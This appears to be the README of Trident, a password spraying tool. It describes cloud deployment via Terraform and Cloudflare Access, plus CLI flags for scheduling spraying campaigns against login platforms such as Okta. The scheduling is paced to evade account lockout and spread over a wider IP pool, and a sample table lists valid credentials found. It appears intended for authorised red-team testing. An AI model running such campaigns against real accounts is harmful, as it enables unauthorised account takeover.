Trident : Automated Password Spraying Tool

The Trident project is an automated password spraying tool developed to meet the following requirements:

  • The ability to be deployed on several cloud platforms/execution providers
  • The ability to schedule spraying campaigns in accordance with a target’s account lockout policy
  • The ability to increase the IP pool that authentication attempts originate from for operational security purposes
  • The ability to quickly extend functionality to include newly-encountered authentication platforms


This diagram was generated using Diagrams. The Go gopher was designed by Renee French and is licensed under CC BY 3.0.


Deploying trident requires a Google Cloud project, a domain name (for the orchestrator API), and a Cloudflare Access configuration for this domain. Cloudflare Access is used to authenticate requests to the orchestrator API.

brew install cloudflare/cloudflare/cloudflared
brew install terraform

cd terraform
cloudflared login
terraform init
terraform plan
terraform apply


Trident has a command line interface available in the releases page. Alternatively, you can download and install trident-client via go get:

GO111MODULE=on go get



The trident-client binary sends API requests to the orchestrator. It reads from ~/.trident/config.yaml, which has the following format:

subdomain: example


With a valid config.yaml, the trident-client can be used to create password spraying campaigns, as shown below:

trident-client campaign -u usernames.txt -p passwords.txt –interval 5s –window 120s

The --interval option allows the operator to insert delays between credential attempts. The --window option allows the operator to set a hard stop time for the campaign. Additional arguments are documented below:

trident-cli campaign [flags]

-a, –auth-provider string this is the authentication platform you are attacking (default “okta”)
-h, –help help for campaign
-i, –interval duration requests will happen with this interval between them (default 1s)
-b, –notbefore string requests will not start before this time (default “2020-09-09T22:31:38.643959-05:00”)
-p, –passfile string file of passwords (newline separated)
-u, –userfile string file of usernames (newline separated)
-w, –window duration a duration that this campaign will be active (ex: 4w) (default 672h0m0s)


The results subcommand can be used to query the result table. This subcommand has several options, but defaults to showing all valid credentials across all campaigns.

$ trident-client results
| ID | USERNAME          | PASSWORD   | VALID |
|  1 | | Password1! | true  |
|  2 |   | Password2! | true  |
|  3 |   | Password3! | true  |
  • Additional arguments are documented below:

trident-cli results [flags]

-f, –filter string filter on db results (specified in JSON) (default ‘{“valid”:true}’)
-h, –help help for results
-o, –output-format string output format (table, csv, json) (default “table”)
-r, –return string the list of fields you would like to see from the results (comma-separated string) (default “*”)


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